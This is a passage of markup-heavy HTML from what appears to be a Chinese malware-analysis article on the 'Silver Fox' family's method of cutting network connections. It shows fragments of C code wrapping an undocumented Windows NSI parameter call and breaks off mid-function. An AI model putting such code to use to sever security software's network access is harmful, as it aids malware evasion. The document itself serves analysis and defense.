style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">))</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pRtlNtStatusToDosError</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">lpBytesReturned </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ioStatus</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Information</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ULONG MyNsiSetAllParameters</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD a1,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD a2,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID pModuleId,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD dwIoCode,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID pInputBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD cbInputBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID pMetricBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD cbMetricBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">NSI_SET_PARAMETERS_EX params </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD cbReturned </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ModuleId </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pModuleId</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">IoCode </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> dwIoCode</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Param1 </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> a1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Param2 </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> a2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">InputBuffer </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: 